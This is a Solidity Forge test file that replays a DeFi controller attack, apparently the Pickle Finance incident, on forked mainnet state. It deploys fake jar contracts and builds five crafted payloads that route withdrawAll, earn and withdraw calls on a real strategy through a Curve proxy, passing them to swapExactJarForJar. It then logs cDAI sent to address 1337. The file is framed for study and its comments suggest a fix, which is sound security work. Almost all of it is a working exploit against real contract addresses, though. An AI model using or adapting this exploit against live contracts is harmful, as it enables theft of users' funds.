Exploit.sol
pragma solidity ^0.6.0;
pragma experimental ABIEncoderV2;
import "forge-std/Test.sol";
import {FakeJar} from "./FakeJar.sol";
import {FakeUnderlying} from "./FakeUnderlying.sol";
import {IController, ICurveProxy, IStrategy} from "./interface/ILogic.sol";
import "./interface/IERC20.sol";
/// @title Exploit
/// @notice Forge test harness that replays a controller call on forked state
///         so the missing validation in that call path can be studied.
/// @dev What this file shows: `swapExactJarForJar` is invoked with two
///      freshly deployed `FakeJar` contracts, zero amounts, and caller-chosen
///      `targets` / calldata arrays. Nothing in this file shows the controller
///      rejecting unregistered jars or restricting the forwarded calldata.
///      NOTE(review): the controller source is not visible here. Presumably the
///      fix belongs there: require both jars to be registered with the
///      controller, and allow-list (target, selector) pairs rather than
///      accepting arbitrary calldata. Confirm against the controller code.
///      NOTE(review): addresses and naming suggest the Pickle Finance
///      controller incident; confirm against the repository README.
contract Exploit is Test {
    // Typed as IController and used only for swapExactJarForJar below,
    // despite the strategy-like name.
    IController constant strategyCompoundDaiV2 =
        IController(0x6847259b2B3A4c17e7c43C54409810aF48bA5210);

    // Every entry of the targets array points at this proxy.
    ICurveProxy constant curveProxy =
        ICurveProxy(0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8);

    IERC20 constant DAI = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
    IERC20 constant cDAI = IERC20(0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643);
    IERC20 constant pDAI = IERC20(0x6949Bb624E8e8A90F87cD2058139fcd77D2F3F87);

    // Same address exposed twice: raw (for ABI encoding) and typed (for calls).
    address constant strategy = 0xCd892a97951d46615484359355e3Ed88131f829D;
    IStrategy constant strategyContract = IStrategy(strategy);

    /// @notice Builds five proxy payloads and submits them through
    ///         `swapExactJarForJar`, logging balances before and after.
    /// @dev Contract creation order (FakeUnderlying, then the two FakeJars)
    ///      is kept as in the original because it determines their addresses.
    function exploit() external {
        // Read-only: the value is logged and not used again.
        uint256 suppliedUnleveraged = strategyContract.getSuppliedUnleveraged();
        console.log("unleveraged DAI", suppliedUnleveraged);

        address[] memory targets = new address[](5);
        bytes[] memory payloads = new bytes[](5);
        for (uint256 idx = 0; idx < targets.length; idx++) {
            targets[idx] = address(curveProxy);
        }

        // Each payload is an add_liquidity call carrying (address, selector, 1, 0, address).
        // NOTE(review): presumably the proxy forwards a call with that selector
        // to the given address; confirm against the ICurveProxy implementation.
        payloads[0] = abi.encodeWithSelector(
            curveProxy.add_liquidity.selector,
            strategy,
            bytes4(keccak256(bytes("withdrawAll()"))),
            1,
            0,
            address(cDAI)
        );

        // Slots 1-3 carry identical bytes, so the payload is encoded once and reused.
        bytes memory earnPayload = abi.encodeWithSelector(
            curveProxy.add_liquidity.selector,
            address(pDAI),
            bytes4(keccak256(bytes("earn()"))),
            1,
            0,
            address(cDAI)
        );
        payloads[1] = earnPayload;
        payloads[2] = earnPayload;
        payloads[3] = earnPayload;

        // The last argument is a contract deployed here rather than a known
        // token: a caller-controlled address reaches withdraw(address).
        payloads[4] = abi.encodeWithSelector(
            curveProxy.add_liquidity.selector,
            strategy,
            bytes4(keccak256(bytes("withdraw(address)"))),
            1,
            0,
            address(new FakeUnderlying(address(cDAI)))
        );

        console.log("DAI balance on pDAI", DAI.balanceOf(address(pDAI)));

        // Both jars are deployed on the spot and both amounts are zero.
        // A controller that accepts this call is not checking jar registration.
        strategyCompoundDaiV2.swapExactJarForJar(
            address(new FakeJar(cDAI)),
            address(new FakeJar(cDAI)),
            0,
            0,
            targets,
            payloads
        );

        // NOTE(review): address(1337) is not assigned anywhere in this file;
        // presumably FakeJar / FakeUnderlying route funds there. Confirm.
        console.log("cDAI after swapExactJarForJar", cDAI.balanceOf(address(1337)));
    }
}